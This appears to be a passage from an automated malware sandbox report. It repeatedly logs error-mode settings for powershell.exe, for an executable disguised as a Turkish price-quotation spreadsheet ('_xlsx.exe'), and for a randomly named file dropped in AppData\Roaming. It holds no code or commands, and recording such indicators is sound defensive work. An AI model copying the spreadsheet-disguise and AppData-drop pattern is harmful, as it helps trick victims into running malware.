                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
